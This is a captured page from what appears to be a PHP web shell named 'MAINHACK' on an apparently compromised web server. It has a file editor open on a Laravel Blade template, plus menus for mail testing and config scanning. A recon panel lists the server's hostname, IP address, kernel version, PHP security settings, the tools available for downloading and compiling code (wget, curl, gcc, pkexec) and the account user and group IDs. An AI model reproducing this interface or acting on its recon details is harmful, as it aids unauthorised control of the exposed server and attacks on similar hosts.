[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: wrapper.blade.php
@extends('layout.wrapper') @section('content') <!-- main content --> <div class="container-fluid"> <!--page heading--> <div class="row page-titles"> @include('pages.project.components.misc.crumbs') @include('pages.project.components.misc.actions') </div> <!--page heading--> <!--topnav--> @include('pages.project.components.misc.topnav') <!--topnav--> <!-- page content --> <div class="row m-t-10" id="projects-tab-split-screen"> <!--project details section--> @if(isset($page['section']) && $page['section'] == 'overview') <div class="col-md-12 col-lg-6 hide_tabbed_section"> <div class="card min-h-300"> <div class="tab-content"> <div class="tab-pane active"> <div class="card-body tab-body p-t-10"> @include('pages.project.components.misc.details') </div> </div> </div> </div> </div> @endif <!--/#project details section--> <!--dynamic ajax section--> <div class="col-md-12 col-lg-6"> <div class="card"> <div class="tab-content"> <div class="tab-pane active ext-ajax-container" id="projects_ajaxtab" role="tabpanel"> <div class="card-body tab-body tab-body-embedded project-timeline" id="embed-content-container"> <!--dynamic content here--> </div> </div> </div> </div> </div> <!--/#dynamic ajax section--> </div> <!--page content --> <!-- page content --> <div class="row m-t-10 hidden" id="projects-tab-single-screen"> <!--dynamic ajax section--> <div class="col-lg-12"> <div class="card min-h-300"> <div class="tab-content"> <div class="tab-pane active ext-ajax-container" id="projects_ajaxtab" role="tabpanel"> <div class="card-body tab-body tab-body-embedded" id="embed-content-container"> <!--dynamic content here--> </div> </div> </div> </div> </div> </div> <!--page content --> </div> <!--page content --> </div> <!--main content --> <!--ajax tab loading--> <!--ajax tab initial loading - timeline--> <span id="dynamic-project-content" class="js-ajax-ux-request hidden" data-loading-target="embed-content-container" data-url="{{ $page['dynamic_url'] ?? '' }}">placeholder</span> @endsection
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.73 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002